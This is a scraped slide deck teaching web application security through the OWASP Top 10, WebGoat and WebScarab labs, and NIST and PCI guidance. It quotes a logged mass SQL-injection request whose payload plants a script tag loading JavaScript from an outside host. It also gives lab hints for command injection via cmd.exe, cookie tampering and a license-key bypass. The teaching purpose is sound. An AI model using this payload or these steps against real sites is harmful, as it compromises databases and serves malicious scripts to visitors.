View stunning SlideShares in full-screen with the new iOS app!Introducing SlideShare for AndroidExplore all your favorite topics in the SlideShare appGet the SlideShare app to Save for Later — even offline
View stunning SlideShares in full-screen with the new Android app!View stunning SlideShares in full-screen with the new iOS app!
"GET /programs/biosafety/bioSafety_handBook/Chapter%206-Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0xDECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' wh??re '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
“ XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.”
Originates from old phishing attacks but less obvious and more dangerous to the user/victim
“ A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks. “
Using the cache from a Chinese search engine Baidu, the Stryde Hax group found multiple Excel documents listing He’s birth date as 1/1/1994
Assume all information can become public
Information Leakage and Improper Error Handling
ANY information you give to a hacker CAN and WILL be used to hack your site
Remove passwords or other revealing information in source code
Application / Database Error Messages
This information may be indexed by search engines!
Application Error Messages ERROR [credit-card-db] (MySqlSystem.java:1331) - Invalid column name java.sql.SQLException: Invalid column name ‘social_security_numbre’: select username, password, ssn from users where id = ? sun.jdbc.rowset.CachedRowSet.getColIdxByName(CachedRowSet.java:1383) at com.mysql.Driver.MySQLDriver.a(MySQLDriver.java:2531) at sun.jdbc.rowset.CachedRowSet.getString(CachedRowSet.java:2167) at com.ppe.db.MySqlSystem.getReciPaying(MySqlSystem.java:1318) at control.action.FindUserAction.perform(FindKeyUserAction.java:81) at org.apache.struts.action.ActionServlet.processActionPerform(ActionServlet) at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1586) at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:492) at javax.servlet.http.HttpServlet.service(HttpServlet.java:740) at javax.servlet.http.HttpServlet.service(HttpServlet.java:853) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl icationFilterChain.java:247)
Misconfigured, Default Settings, Unpatched Systems
By default, you may already be leaking information!
Includes all “infrastructure” applications
Web Server (Apache)
Access logs are public by default
Directory listing is enabled by default
Application Server (Tomcat, PHP, Coldfusion, etc)
Database Server (MySQL, MS-SQL, etc)
Public accounts enabled by default for MS SQL Server
3 rd party applications (PHP message board, webmail, etc)
Hackers look for easy access to your server
Exploit a known vulnerability if infrastructure application doesn’t have latest patches
Gain access to server using default credentials
Use default installed “snoop” or example pages to learn more about your server
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization .
Fancy term for parameter tampering
Involves modifying parameters to access unauthorized materials
The hacker modifies the parameter to view another users account
“ Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly. “
SQL Injection Attacks “ SQL injection is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements. “ (Wikipedia)
“ Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.”
Happens when code is executed on the server from a non-trusted source
All web applications are vulnerable to malicious file execution if they accept filenames or files from the user.
Classic example: PHP is particularly vulnerable
Hacker visits a website that allows uploads
Hacker uploads a malicious code
Hacker learns directory structure and sends the path as a parameter
You may need to execute “ & c:windowssystem32
etstat & windowssystem32ipconfig. Make sure to click on “Accept Change” in WebScarab and also, click on Intercept Request to change the parameter submitted to the backend, which executes cmd.exe! The results are displayed on the result page, at the bottom. You have to scroll to see them.
From http://www.owasp.org/index.php/Top_10_2007 “Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.”
Never store passwords in plaintext
Encrypt or Hash (preferred)
Architect applications to check every request to see that the authentication data is still valid
Issue a new session token when the user authenticates
If you absolutely must use “remember me” functionality, use a difficult to guess authentication cookie
Authentication data is sent with every request, so protect it
The default webscarab should work however, if it doesn’t, go to WebScarab->Tools and click on the checkbox “Use Full Featured Interface” and restart WebScarab using “Start - > Run” command to obtain the tabs in the Solutions and fiddle with the cookie injection. After you restart WebScarab, go to the Proxy tab and then Miscellaneous to UNCHECK the “Inject know cookies into requests” checkbox.
Realize that the “secret” cookie is simply the account name spelled backwards and then each letter replaced by the next letter in the alphabet. This is not a good secret since it is relatively easy to guess.
From http://www.owasp.org/index.php/Top_10_2007 : “Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.”
Use latest standard encryption methods
They are standards for a reason! And they change over time
Use strong standard encryption methods
Stop using Message-Digest Algorithm 5 (MD5), Secure Hash Algorithm (SHA1), Data Encryption Standard (DES)
Use SHA-256, Advanced Encryption Standard (AES), Rivest/Shamir/Adleman Public Key Encryption (RSA)
Use WebScarab to intercept the response. Reset the prices. Submit.
First, try to type in ‘a’ into the key and see that the response is “Wrong license key” and the “Activate” button is dimmed.
Use Browser “View Source” and look for the XMLHttpRequest function. Understand how Ajax works. The scripts exects eval(message) to evaluate the response. The document.forms.SUBMIT.disabled=false; command replaces the returned message with simply the new HTML with the activated license key submit button, allowing the user to obtain whatever the license key allows.
Open Web Application Security Project (OWASP), WebGoat and WebScarab
Using WebGoat to understand OWASP’s Top 10 list
Additional Vulnerability Topics
Essentials of a Comprehensive Web Security Program
Essentials of a Comprehensive Web Security Program – 33 Principles National Institute of Standards and Technology (NIST) Special Publication 800-27 Rev A - Engineering Principles for Information Technology Security
Establish a sound security policy as the “foundation” for design
Treat security as an integral part of the overall system design.
Delineate the physical and logical security boundaries governed by associated security policies
Train developers on secure software
Reduce risk to an acceptable level
Assume external systems are insecure
Identify potential trade-offs between reducing risk and increased costs and decrease in other aspects of operational effectiveness
Implement tailored system security measures to meet goals
Protect information while processed, in transit, and in storage.
Consider custom products to achieve adequate security
ISO and NIST are expensive to implement comprehensively
PCI is relatively short, extremely detailed and comprehensive
Think about applying PCI DSS to non-credit card taking Web environment. We are…
NIST: Security Considerations in the Information System Development Life Cycle http://csrc.nist.gov/publications/nistpubs/800-64/NIST-SP800-64.pdf SDLC | Security Considerations -Appropriateness of disposal -Exchange and sale -Internal organization screening -Transfer and donation -Contract closeout _______________ -Information Preservation -Media Sanitization -Hardware and Software Disposal -Performance measurement -Contract modifications -Operations Maintenance ________________ -Configuration Management and Control – Continuous monitoring -Installation -Inspection -Acceptance testing -Initial user training -Documentation ____________________ -Inspection and Acceptance -System Integration -Security Certification -Security Accreditation -Functional Need Doc. -Market Research -Feasibility Study -Requirements Analysis -Alternatives Analysis -Cost-Benefit Analysis -Risk Management -Acquisition Planning __________________ - Risk Assessment -Security Functional Requirements Analysis -Security Assurance Requirements Analysis -Cost considerations -Security Planning -Security Control Development - Security Test and Evaluation - Linkage of Need to Mission and Performance Objectives -Assessment of Alternatives to Capital Assets -Preparing for investment and budgeting ________________ -Security Categorization -Preliminary Risk Assessment Disposition Operations/ Maintenance Implementation Acquisition/ Development Initiation
<Identify the various user classes that you anticipate will use this product (i.e. users doing updating vs. users with browse access only ). User classes may be differentiated based on frequency of use, subset of product functions used, technical expertise, security or privilege levels , educational level, or experience...>
2.5 Design and Implementation Constraints
<Describe any items or issues that will limit the options available to the developers . These might include: …corporate or regulatory policies; …interfaces to other applications; specific technologies, tools, and databases to be used; …communications protocols; security considerations .>
3.4 Communications Interfaces
<Describe the requirements associated with any communications functions required by this product, including e-mail, web browser, network server communications protocols, electronic forms, and so on. Identify any communication standards that will be used, such as FTP or HTTP. Specify any communication security or encryption issues , data transfer rates, and synchronization mechanisms.>
5.3 Security Requirements
<Specify any privacy issues surrounding use of the product or protection of the data used or created by the product. Define any user identity authentication requirements . Refer to any external policies or regulations containing security issues that affect the product. Define any security or privacy certifications that must be satisfied.>
Open Source Reusable Security Components (a few)
Shibboleth – Web Single SignOn (SSO) across or within organizational boundaries.
Grouper - consolidates delegated manual management of groups and membership.
Signet – authorization system
Central Authentication Service (CAS) - an enterprise Web single sign on service.
Web Application Vulnerability Scanning Tools – Open Source / Free
Nikto - an open source (GPL) web server scanner testing web servers for multiple vulnerabilities, including over 3200 potentially dangerous files/CGIs.
Paros proxy - A Java based web proxy. Supports editing/viewing HTTP/HTTPS messages to change cookies and form fields. Includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting.
Imperva's Scuba* - a multi-platform free Java utility that scans Oracle, DB2, MS-SQL, and Sybase databases for vulnerabilities and configuration flaws. Creates remediation reports with detailed test descriptions. Example report from our Credit Card Processing SQL Server:
(high) xp_cmdshell not removed : this procedure allows issuing operating system commands directly to the command shell
GRANT given on registry stored procedure: Permissions are granted on stored procedures that allow reading and writing sensitive data from Windows registry